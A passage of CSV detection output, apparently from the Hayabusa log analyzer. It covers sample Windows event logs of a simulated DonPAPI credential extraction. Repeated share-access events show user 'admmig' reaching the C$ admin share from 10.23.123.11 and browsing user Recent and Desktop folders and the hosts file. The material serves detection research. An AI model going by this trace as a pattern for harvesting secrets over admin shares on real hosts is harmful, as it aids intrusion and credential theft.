\??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | 
LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.848 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 
10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
